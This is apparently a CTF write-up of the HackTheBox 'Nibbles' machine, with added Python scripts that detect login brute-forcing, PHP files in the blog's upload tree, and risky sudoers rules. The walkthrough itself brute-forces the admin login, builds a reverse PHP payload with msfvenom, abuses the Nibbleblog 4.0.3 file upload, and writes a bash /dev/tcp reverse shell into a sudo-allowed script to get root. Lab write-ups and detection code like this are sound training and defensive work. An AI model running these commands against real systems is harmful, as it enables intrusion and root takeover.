HackTheBox Nibbles Writeup

Enjoy reading my HTB Nibbles Writeup

HackTheBox Nibbles Walkthrough

HackTheBox is a popular service that offers CTF-like machines to let infosec professionals improve their current skills or learn new ones. HTB Nibbles is one of the machines commonly recommended as preparation for the OSCP exam.

Information Gathering

Let's begin with an nmap scan against the target machine:

sudo nmap -p 1-5000 -sC -sV -T4 -v 10.10.10.75

Two services are running:

So, we know a web service is running and the running operating system is Linux (probably Ubuntu).

Browsing the website, we are greeted with "Hello World!" and nothing more. Taking a look at the source code of the page, we see an HTML comment:

<!-- /nibbleblog/ directory. Nothing interesting here! -->

Before checking the directory, let's start gobuster as there might be more:

gobuster dir -u http://10.10.10.75/ -x php -w /Lists/directory-list.txt

Taking a look at the source code of /nibbleblog/, we can see that there is a subdirectory called themes and one called admin. Browsing /admin returns a directory listing, which might be a sign of an LFI.

I tried attacking with an LFI, both using Burp Suite and manually, but had no success.

Next, let's enumerate the nibbleblog directory using gobuster:

gobuster dir -u "http://10.10.10.75/nibbleblog/" -x php -w /Lists/directory-list.txt

This reveals a login page at /nibbleblog/admin.php. I intercepted the login request with Burp Suite and sent it to Intruder in order to brute-force the admin password. Unfortunately, some sort of fail2ban-like software was installed, so it took some time.

With the credentials admin:nibbles, you get redirected to admin.php?controller=dashboard&action=view.


Gaining a reverse shell

On the settings page we see that Nibbleblog version 4.0.3 is being used, so it is time to check whether there is a known exploit for this version.

Luckily, version 4.0.3 is vulnerable to arbitrary file upload:

I am going to exploit this system without Metasploit by abusing the My_Image plugin. For that I first created a PHP payload using msfvenom:

msfvenom -p php/reverse_php LHOST=10.10.16.180 LPORT=4545 -f raw > shell.php

Then I uploaded the shell by navigating to Plugins, My Image, Configure (ignore all the errors). During enumeration, gobuster found a directory called "content". Navigating to this directory, we get a directory index and can find the location our shell was uploaded to (/content/private/plugins/my_image/shell.php).

Browsing to the file gives us a session on our netcat listener as nibbler. Even though the shell is very unstable and cannot be stabilized easily, it is enough to navigate to /home/nibbler and read the user flag.
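Two things on this box leave traces a defender can look for in the web server's access log: the login brute-force against /nibbleblog/admin.php, and a .php file being requested from the blog's content tree, which should only ever hold data such as images. The following detection script is an added example and is not part of the original writeup or of Nibbleblog; the Apache combined-format log lines it runs over are constructed for illustration, and the thresholds and the content-directory prefix are assumptions you would tune for your own deployment.

```python
import re
from collections import defaultdict
from datetime import datetime


def constructed_log_lines():
    """Constructed Apache combined-format lines (not captured from the box):
    12 rapid login POSTs from one client, a normal visitor, and one request
    that executes PHP from the blog's content (upload) tree."""
    brute = ('10.10.16.180 - - [10/Feb/2024:12:00:{:02d} +0000] '
             '"POST /nibbleblog/admin.php HTTP/1.1" 200 1611 "-" "Mozilla/5.0"')
    lines = [brute.format(sec) for sec in range(0, 24, 2)]
    lines += [
        '10.10.14.5 - - [10/Feb/2024:12:01:00 +0000] "POST /nibbleblog/admin.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
        '10.10.14.5 - - [10/Feb/2024:12:01:01 +0000] "GET /nibbleblog/admin.php?controller=dashboard&action=view HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
        '10.10.14.5 - - [10/Feb/2024:12:01:30 +0000] "GET /nibbleblog/content/public/upload/cat.jpg HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
        '10.10.16.180 - - [10/Feb/2024:12:05:10 +0000] "GET /nibbleblog/content/private/plugins/my_image/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
        'not a log line at all',
    ]
    return lines


# Client IP, timestamp, request line and status of an Apache combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Parse one log line into a dict, or return None when it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev


def php_in_content_tree(events, content_prefix="/nibbleblog/content/"):
    """Paths of .php requests under the content tree (assumed prefix), where only
    data files belong; a hit means a script was planted in the upload area."""
    hits = []
    for ev in events:
        path = ev["path"].split("?", 1)[0]          # ignore the query string
        if path.startswith(content_prefix) and path.lower().endswith(".php"):
            hits.append(path)
    return hits


def login_bruteforce(events, threshold=10, window_seconds=60,
                     login_path="/nibbleblog/admin.php"):
    """Clients that sent at least `threshold` login POSTs inside any sliding
    window of `window_seconds`; returns {ip: max POSTs seen in one window}."""
    per_ip = defaultdict(list)
    for ev in events:
        if ev["method"] == "POST" and ev["path"].split("?", 1)[0] == login_path:
            per_ip[ev["ip"]].append(ev["ts"])
    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start, best = 0, 0
        for end, ts in enumerate(stamps):
            while (ts - stamps[start]).total_seconds() > window_seconds:
                start += 1                          # slide the window forward
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def run_detections(lines):
    """Parse the lines (silently dropping unparseable ones) and run both checks."""
    events = [ev for ev in map(parse_line, lines) if ev is not None]
    return {
        "php_in_content_tree": php_in_content_tree(events),
        "login_bruteforce": login_bruteforce(events),
    }


if __name__ == "__main__":
    for name, result in run_detections(constructed_log_lines()).items():
        print(f"{name}: {result}")
```

On the sample data the script flags 10.10.16.180 for twelve login POSTs within one minute and reports the single .php path under the content tree, while the visitor who logged in once and fetched an image is not reported. The same two checks also point at the fixes: rate-limit or lock out repeated failed logins on admin.php, and configure the web server so that nothing under the content directory is ever handed to the PHP interpreter.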


Privilege escalation

Taking a look at our permissions with sudo -l, we can see that nibbler is allowed to execute /home/nibbler/personal/stuff/monitor.sh as root without entering a password. Since that script lives inside nibbler's own home directory, nibbler controls its contents, so whatever is written into it will run as root. Let's navigate to /home/nibbler. In there we have the user flag and a file called personal.zip, but no personal directory, so extract the archive using: unzip personal.zip.

In /personal/stuff we now have our monitor script, which I rewrote in order to spawn another reverse shell with root privileges:

echo "#!/bin/bash" > monitor.sh
echo "bash -i >& /dev/tcp/10.10.16.180/8899 0>&1" >> monitor.sh

Then I executed it with sudo /home/nibbler/personal/stuff/monitor.sh and got my shell as root.

Simply cat root.txt and you are done with pwning this machine.
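The root cause of the privilege escalation is a sudoers rule that grants NOPASSWD execution of a script stored in the invoking user's own home directory. An administrator can catch this class of misconfiguration by auditing sudoers for NOPASSWD commands that point into user-writable locations, use wildcards, or allow ALL. The audit below is an added example, not part of the original writeup; the sudoers text it parses is constructed to resemble the rule found on the box (the `backup` and `deploy` entries are invented for contrast), and the list of user-writable prefixes is an assumption you would extend for your hosts. It is a purely textual check; confirming the actual owner and mode of each flagged file on the host is the complementary step.

```python
import re

# Constructed sudoers sample, modelled on the kind of rule found on the box.
SUDOERS_SAMPLE = """\
# constructed sample, not copied from any real host
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /tmp/cleanup.sh
deploy  ALL=(root) NOPASSWD: /usr/local/bin/deploy-*
"""

# Directories an unprivileged user can normally write to (assumed list).
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

# user_or_%group  host = (runas) [TAG:] command[, command...]
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<rest>.+)$'
)
TAG_RE = re.compile(r'^([A-Z]+):\s*')


def parse_nopasswd_commands(text):
    """Return (who, runas, command) for every command granted with NOPASSWD.
    Tags such as NOPASSWD:/PASSWD: apply to the commands that follow them
    within the same rule, so they are tracked per command, not per line."""
    found = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()       # drop comments and blanks
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = False
        for cmd in m.group("rest").split(","):
            cmd = cmd.strip()
            while (tm := TAG_RE.match(cmd)):
                tag, cmd = tm.group(1), cmd[tm.end():]
                if tag == "NOPASSWD":
                    nopasswd = True
                elif tag == "PASSWD":
                    nopasswd = False
            if not cmd or cmd.startswith("!"):     # empty or negated entry
                continue
            if nopasswd:
                found.append((m.group("who"), m.group("runas") or "root", cmd))
    return found


def audit_nopasswd(text):
    """Flag NOPASSWD commands whose target the invoking user could control or
    whose scope is too broad to be safely passwordless."""
    findings = []
    for who, runas, cmd in parse_nopasswd_commands(text):
        path = cmd.split()[0]                      # command path without arguments
        reasons = []
        if path == "ALL":
            reasons.append("any command")
        elif not path.startswith("/"):
            reasons.append("relative path")
        if any(ch in path for ch in "*?["):
            reasons.append("wildcard")
        if path.startswith(USER_WRITABLE_PREFIXES):
            reasons.append("user-writable location")
        if reasons:
            findings.append({"user": who, "runas": runas,
                             "command": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_nopasswd(SUDOERS_SAMPLE):
        print(f"{f['user']} -> ({f['runas']}) {f['command']}: {', '.join(f['reasons'])}")
```

Run against the sample, the monitor.sh rule is reported for sitting in a user-writable location, the /tmp script is reported for the same reason, and the wildcard rule is reported separately, while /usr/bin/rsync passes. The fix for the first case is to move any script that must run via sudo to a root-owned, non-writable path such as /usr/local/sbin and point the rule there.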


Tags:

htb, hackthebox, nibbles